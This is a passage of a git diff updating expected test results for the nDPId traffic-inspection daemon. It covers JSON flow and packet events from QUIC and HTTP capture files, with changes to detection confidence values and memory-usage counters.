02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598618820678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820678,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTgvc71QwNTAACFVfMtNfKdhjRTVAGOq\/R1tSJ490cCgCIJtMuLgnF7hKWcwUWGCG1yeUQra8M2IbabEbv3t9rDs1mKoSxG0o1SwNZg+TYNjx60XPnxlQjdaPemBfWHhyIShS\/FwerrScOvQMg46Oklvwr2FyLIMnAlNL\/mWc7+8747IMQbAPr5vlwnAdmo2qfZtYMtdIW1xhXCBxR7JJFwiBMgxW++zHicn7moaT8\/+bDZ+HzEepJeBYrSVteiS0BK0n6cCyVowGk\/PbfkfkASgXD5BG61Cd+nr8Af7qfQdcKurj0yyrH5h1viElvy4SUonTnuNRTXgRmkWFI5Dx655anVNEDyyIA+LInCwiGE39JR+co6yzHCype7nL72Nq+jikfQUPfI883b5MrQ9rngGiZ8\/Xj8lYP\/QZ3\/ogby7k8+EqRcwwLdrKtF5JCPQHA47uMBlHe04rS8i00HZ6nSli4gEiz6jamp06cf0n39bZgvUQjAKf0ERdv971hRGdG0miD7H3QBKDkYd3jMMaCW0xLn2JbaBK1oc8XsPcVUeGlwQmCRwBHHJ8Zi5U2cVPlHrY4uUezGQwo3VZ3r5q95rt435Cj51jZ28FqxsNIE11PMXbcj4IXggGlyQVSDdlQV8ySpernoTOLJ7ESEF3t54ex\/kmX4c4cMPX9ddsiAY5den0AJP0\/NiKWL3LrUSrEOm8wr\/TSwK8v7YyoUXFr0q9WzgNo3XQrwUtAlQBmFb24DGYwbS+3XNGulanTnYpBrsb5c1rh0p91mAhQ\/rpURoxrNHqQru2XnDOVB85T41pLYZBM1fI2jpefgEQe9S28IEB\/1eLwrRuiU\/FIh6zJnowpUGRMkPEcli\/a9qk4i1KUhncByKhdd\/9ipm3FA0L0wwJh9k7FyhUMixNB17ijKhZ9gdil7oXiNMdx124Nmzbbk5lrjKivTcJ9RPINOAPRUQFR1RdL0N6Kq0CLXSzCDdZdLrY9En+mVKeYQj0xo\/jR18exhwt\/eRGfcgKxU3vj0n7pPV2efcnGnYI\/qnwevG1XcNdzUDvV4mVcXNvYEPxKSNdhD7Gpk6sGnaPSQTI2HNf0HmdlyCkLZSrpVeHOY4fveiP4Adr8M05Zxd0p3+8DcvQwP4QYKb2558+ox1mWrMBcDoH8rfM8Obyh3XuvPIl+jImNEF6BP6N3059LnOdatU9xWrsdLNJEgvG9u60Lk7nUNGZtXy46J65s6wF0c50NT+RmqoC2LZher4uoex39pj1K8V7kaJv3pcV1GjZn7eaJfrytSHHD08EAQGGAMIFMRg6nHfi8XeYIO3oF5hSYGXvUcdNd7WIgnidI\/Dzin6YMvkS0sgovzeBscolAktAP7weC3mq1LIaKYgNt2UsL8d9KL8\/n8B6R\/Yt81QFXYZf8g3+P4tPy\/kkSsNIfvswl3y0LDlhheLGqrpmqC8lIBGwv8YQXlaspfmVjHdirPP2SwJhDXPOI7i0j92jF26bcCvOi\/MymU9+Eb7WBD7jBktqD9MQhYDPOR1XZV0o4Os8ysZy\/WuU9JD6fru3jsr\/kKCqPguqlfF+W\/br9kviTd3\/eB4VY8p+7Zw2IhUhbAAnr8CvfrB2S\/TOapOVIXCtl3VT4kPt7qxNllSaLAB7HZ0kifbilO2MEKf7JHrUnpsA6AJyeHwuLS7wsXBPwyB\/OuLAVAq7ZLX3Aej45laD+jKQmWnX35iCvC2Lk0iNpz0KaPylARDD4R6xtjFuUiuuiD+\/VDor8Z42laVln8rezBVKWbgIJ0+RzyJkUTKFz9D8WmujYRQ1"} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"thread_ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"thread_ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":7916,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1598618820984} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880171 bytes -~~ total memory freed........: 5880171 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6013805 bytes +~~ total memory freed........: 6013805 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2279 chars diff --git a/test/results/quic_t51.pcap.out b/test/results/quic_t51.pcap.out index 27ae5652a..fd73781b5 100644 --- a/test/results/quic_t51.pcap.out +++ b/test/results/quic_t51.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1598620434413} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02260{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598620434413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434413,"pkt":"AAAAAAAAAAgAH83gCABFAAViXjpAAH8R7IK744iY0\/eTWtg8AbsFTvswwVQwNTEI\/5QVtbAFhg0AAEU0lc1seKsogM0xJ2my4Aiqph+R\/2N2Tlopv6L1CTJ74mgIopdeTMsbdYmmZHP80OXizzota6YFHVZ9VeAcEZo8pgEgiYZUg70bNed022uBY2n4AIBJaoTaZc4dlK\/B4TiUFC+WiYMdxcvH3S2VlmhK+Rc2gUQHqAYLkzqvz5M6NYLldilKxcCw\/ToJ+zu5fHTAbQipFFqbD95GLa7oBCU7jPE\/wj2QE1M9Wk52+SrgbNiKCHm0Oi8\/\/aC+8QR8oPQVWsQzjkcyagMWDaycHo+Z2gh2YqGCJoepFNsqgtO8uWWNDiaisHNHQDCPrCt5EDVvLMLkZZQTcE9bxIhJucB4CNr926kRAjaB4Y5CqDAEear5TtCJ3Iu0C2bzBjoi5J9LPiwVBQYhfxtqGdX9O3nANKjdbMVqvYl742MGo2YFm2J507oPMBXLqPJW2a2j\/XlrdIcqLJLXy1ruiet2Yfof5cTaMXQp6wyOq8s2kLEeb0RqG380zHAhUvwTfCiEYvwSN8+LPb7d1HKu3JRvbfM4A2u6D3\/ccc40B8jpt6t8mVTCa92M7s8hgVfDHCvoiaTxRF07ULZWTbuRFjLXA3G\/QLzl0b2QQA3PRqMO1r4YLM9IhL+9TjIm9kskk81nFsbcqeUPPCIl5SvakooZ1Ne4vlHJM7vcPwHkRJHa+PMjtknf1D9FmcaRoK2gywFTRk2j2RKXeNNGP3fOGBMRmVstntMO9HlCQR0pqWkIJ+jw+vDqFHMVZBwco3px5tJKsYik1W4I7vDVokn8tYkCXuWkDqmw9KvnktOeNU+eoLbnbQi\/AJnaCX22\/pOnvMBDUqcAEyxhhPUDxacTTuyCy01g9D7qNJmAhz3k5MC2zTm67IILY1heZ2AuYvQwYQOss3bJtjPNa+uV1pVbQiVw6S2nvxKgtq5Z9DSuXhvsbTOp5GSq1YV0eewMUT6nB6ejScFWGv+XM50Rf10iuSgO6pXznyY29qMMOcdfxFMWk8ZhEALkKLXeqjM+FjHgPqVYhtjd0Mxa3xCi4pEnff1YF4nj78KYHZrV2zxl6ihclVVh4iHXNFGI+s63vsFXEOTBejfPsr6+VmTDJ1+o1kNk93XUE\/bQ82a18NJPdXQ6kf26Qjcc4RqnTvAmrWh\/6fmG4zIriY7A9z8t4eO9Qfr9TLO3k0B5JOVnWVTqlbOvrJgEzV95Hv0ioO0xIj5BnxrbLnlwbNfPjVGTcRNAh71gU32J8rr6rCxxCaTv4RU7KdiQ+zigC0LKK7x4OPs9n2Ka2KUPy25mrLQ\/hk5IjtzsrqqQ2MzNcZhxb0kkNCxELzOQUMbpkFnw3XGvEDCJVplyR1UqjiDFOL8\/JfuephE1oyHWeOYVwVd2Cwv2PGGx05T5JJWiwFxWUNPRdBpTvDS0w\/p4Nd\/c2GPaorYCv1rEFAbYJpF4F6I30H8WeSXKzzhCDJKK0+cDwsUjqsSRJxU4ftS+uYB0XeJmKhKFuSfMEVI0q1YpMQZE\/G2MC4zAighNsEoUwNwWYS2545Iu3+Eegoe47B\/k8tCSheavZoHCQ6GLnzYKEdctMGvZqMVOXsPQnYlobmVfhCoHYAqTL++rI+V2XgKmzpdEDycwwsSLkVWoYU4lGAoPMP3kxasfCnUHU\/V6gkc7C3bskka9cplZd3pC0DtI8Ams8W1VIknYpHJDhbirGSRTc6oJbJQK8NbF0mBg+7QAzF7Cg20VSPH1oCq1EEodwhHlQBTHEkDIUOOWm8A2kePv2bx2BTxVuCDz2D78zh51"} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/86.0.4240.9 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T051","ja3":"92e76078d514999cd950474995dab2b5","tls_supported_versions":"TLSv1.3"}} 02266{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598620434419,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434419,"pkt":"AAAAAAAAAAIA\/tPQCABFAAViAABAADcRkr3T95Nau+OImAG72DwFTvx1wFQwNTEACP+UFbWwBYYNAEU0cA7ob5DRu6SNsqDMEz7qri8UnfijZV8Hhw\/oxky0x+Zt0s6erWm7kWn2+1owrYTdI9p89OpW\/6ptpwv9v0J5BjJyyLuuQ7qMgzGXDs2ur++juUsUpOdkAs5K5BYVfQAmPmXEGyVgmyCeUg1T7Vj6FslmnDV909IngQqr2X3bAL3as4fB8O0bAq64I2nnjXRSsXtOF+WecFDOIkhsUozc+8M2nJh6kczAN6BO7Q6B24T4pTF7f\/SWotAh0wmioZGWvmsK3tbjrCGONmSc7G6EA+eCMtEUY\/yq8VyKOSmIHald\/L7JGCPyNYCQuoSWiWNaW\/I+iZ2Tm83YJ0ULZZc8urwFDYH3aj1AkglwflqENARW1+\/0Wgf8CdNT18FiabAis+X7vPL\/K0rfVmIy72rlRNRfOG7y7nzx1KwQOQc8aCVF3CWYU+Lmd10cKRMsTRDen+t7CfJT6D6czKmRS9zHy8defw2VL+sr4ea6knMol1lydS5om9MxXCYpqegXuWZiFTSbzJvhE4RaqOqWqlC3CyDO4ySp0wcYRr6Xiz\/ypHsBLBgujZNocUdxB92srmLhWvU+EKXNqnvn4sN9tP\/B4VI81UNJfpKqafd5TbC3xVerPG2FpOE4rg1k2rQi9r6v1+PQ\/d3R0LlFcbJ1hI9fgnNKZUfeIejFNzw84ZCPAGKEZF9DRij\/q7+ynKTHsKprl5SyrzqmDatgR6jPni4YdUIipVxz2xAMDSfgGHJudxWet0g70XvUgRUnZwnINCVHKug\/Cwaar4s1XCM8uhzoEef40bHIf\/1cPPikcn5BGvUj0yq5vKOgKlUAn1Pgd3RmxD4udRVK4hr3Qq2qz0yzGHjPkF5V31PdO+LbljCDil0atM9nNzYRQDTxXIy4ROBhbRF0GC5xxy\/5G1Z3EVEXnUgV7cKAoSoRYsJk+ehBddHi\/2\/aZLTP9GUgaj03e1ZAUqg\/pLbgzkOggtkBYwlEystem00J3RiW59azSXPWDzpQD37GvUqWpvchJjuAPROhp0eQOeyP6Sm5m8Ha1f9MDT\/mDWqN\/iBuFORPOJebKiYDmtBTotFqfXW1txgynw6EHUJzSE+pl4MdTTWGiKeLLjK6VcgkjK3QCvZi2YAV34jHwjHZGw2P\/U6KrMCfYoKLgcta7eGwEJgt1TEOATVA86YdSNrUK8Cm6qplxo7u2vCTdHfHERZHXlWiV5V+M6yg8jJ+w71hYe+9QRnWDWxxhFwqS3Rom5NgfL3qyZPAg7B0TvVcGC3k1t2hVxdIBJT1YLB9P8xcq205KojLAkrnJ6A03YtC2cE+\/GfTI6rrSdcn22uQHH1uwQgPFlvo5F8SRGnmtqbBCoQkhDA10opFpEUHAKVRysF1xT\/NgfiMQHD+An4IrPRfuv9gDg0rUkwJww22wh5gLlRkZ\/Syy5BClTzH9Eje2q1QlkG4NyNIdxlgTeTWfrV+owYm4Q+FXDFSqiziTTjYt929oBaNekN7DaLZNKBHzE9aRpnZjKaGJOIkilbSRnfMsOP+KhOdyxkYqJB7lgyVuE7zA+Cs6QfiNfeFBdysqGJcMLaCJe1XQZYseYZCHv9I1fYRd7rHJDJ5TLxG9ZoKBvyy9qAFruCnQdJM3kRJUF0ZdxtTsL1YtSrJYqn3hcGRfsN64Wu2ioNCdgwzJ\/IOr225URP0O\/yfvAjNTo393KgekGIplrSAr2vqB7j6oyQmlBJgPRuYDzTKmIMBKNHRY+Gk4U31TV\/ldcN5g5htDYX20DA3i7tEfKzfbUYY"} 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598620434482,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598620434482,"pkt":"AAAAAAAAAAgAH83gCABFAAViXl9AAH8R7F2744iY0\/eTWtg8AbsFTtamzVQwNTEI\/5QVtbAFhg0AAEU0KsIg8w2st8fMy25uq6gsPA7KRO4wWARaQxn0e+nvMAG\/ncVOK2\/1iV8zM1GT+gj2yfRnYitTLViCwPF0TV0R7p64xnLqwrHTiNaW89JgMAHQze00LP7FiTbOvqpo5S+7AzCO4J36LH8gasnIPNye5ytyGP9hxarM0Gwv6wB1BKIgh6Hfi9vN\/Jaq\/hKaWtnsFyqFx21T1U0YmQzCOhcYGHZNHNGEmxqlfOiET0cy7A2zooythTNQBScefWz4fyugA0KO5z5EPbOCuLPnOhJ8u0jAA5snZ9Av4lfTCNurCTo\/b96gqEMXFCAN6kklskS6mSW1P2yxo93FRN9w3VFPyMe8m7WnAxPUMrijM3bZFrpYXz6N3LoSvj\/7t1mbaz3Ew6W7CCET2\/vUPuty0yYuKN9hlZRGZDAOI7p7UV84zBa3MKUoIB90BBwtqXlv\/AcyfRFhSrAf1TPDIen8IRojBr5qTqwwDIcvMREVIsmeXYDDAIh87njz+3l6UiC0r72z0Vz8KlwPmvyd1tNbK4UoVu5yliqV7BzHAT0P+flRjAVL+Vtw\/1eTO0KLmizThDqycqyAF1MjS6cC4BRlgBDuBvC7oqizuHTk4JOICP+TLa71t9U0MO4SvptmKRFy9UA159ziHHDRbAhIzzVEm+HGxTjT93PUzlkT4beWAgYYW5swcH8m2E+qX\/jfh4l+RAJ7s1FC99eqQD\/G2qHKz49sTvtw3eknSSHiADw1dFNDiGytHeAJqgKsYZ6xbxYgMT8vQQJWpcCaoPnc1R\/36QBSKDfO0Ei6I0Nk2Twp2jW7ybYg3WV9zcO8mcO+t2rUANioNNaghKiQ6\/\/kCvnfaOZl9\/nMaaP8oRI80YNnM3bBLePCUoIodPlfRsS+qRORwVaYVbmTkVd+7OOE68KIf+CtQJzWPG1I9szX6EUokwcVW4JeKB3DLXSgUJqbrCp8nB5Gt1Xl+DVmAWNn0zlmAkUkIYwVaRlUBt12nmZM5GfCFjeNYwyxKhMtco0zqNoFh6GPimEo\/HJoIaculB01PGh4MlKE33m6lcbQnV2mcjQy9+X6G7gJAvssvNVim+h2CyUIa0AFnvBEp0BZ0LQBw4xxW1+LO+851oEKlpBHf2CaPTJQbQ3lYLcFUbbZ7WxtncvtHzy\/SI9UgKeWcagnCcsYLbPsnPnloEl6cnUj6vnGVoFZ0zI4TVPk88\/biBoFXX37AYSAsISWoXJh5fdyK7Ub3uTshAtqeqBBTUeUFjb5Aj4cdCLyefeqdX7eVX7iolZTDjMHw6WHcQg9j8QT5ZehE6eQ3EWBv\/dyJkxi+P\/\/5RRqzAOol5xZb6h4LuhsvzWHQihAaP9MzFNZJKsrSoe\/spLPEQi09YKZ53xMfFjPTNozP7awNtIb6QltDJNIByFfslEQklWBp3nSDDraHwFBspLwhrXO\/4KJq80I0e6UvL2AGkUJ3WcnYVtrSbxxk4APJ7JesOtrVvfG0zUeYMWMSCdfwkF4KodqZGtJ3QATjzBea+nTD5uHk34dDyJnSJKk0ILq0jIFLho8LlWIyJH4QOXOz4qaWrv1Yq7zohspvZk7qqBfzWtq9nyRWQ1TZln6OTuRj1nSwDkH3Qwyv3P3ftVCIjgLduzJ1KxoPir\/gAp5xz8YWBMXoD3IJzkv\/PGQNpizq54tSdx\/+EwNQ0FXkMrTDVKVITAuSnBIkg9sH6JW+WpNYsbAPv3JnEFyzt8fIeM\/r0Qmf+N6zxgE9jaSg9C2Ue6YSiQO2VAdyYTxTvnFaxwR"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"thread_ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":642,"flow_first_seen":1598620434413,"flow_last_seen":1598620524479,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":546754,"flow_avg_l4_payload_len":851,"midstream":0,"thread_ts_msec":1598620524479,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":642,"source":"quic_t51.pcap","alias":"nDPId-test","packets-captured":642,"packets-processed":642,"total-skipped-flows":0,"total-l4-payload-len":546754,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1598620524479} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 642/642 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5898444 bytes -~~ total memory freed........: 5898444 bytes -~~ total allocations/frees...: 118778/118778 +~~ total memory allocated....: 6032078 bytes +~~ total memory freed........: 6032078 bytes +~~ total allocations/frees...: 121540/121540 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2272 chars diff --git a/test/results/quickplay.pcap.out b/test/results/quickplay.pcap.out index 59a80f4db..2f190d573 100644 --- a/test/results/quickplay.pcap.out +++ b/test/results/quickplay.pcap.out @@ -2,123 +2,122 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1429000030398} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWBDAUAAPwaoIQo2qfp4HCMpxewAUEHDiNf6xwiBUBgAc22rAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 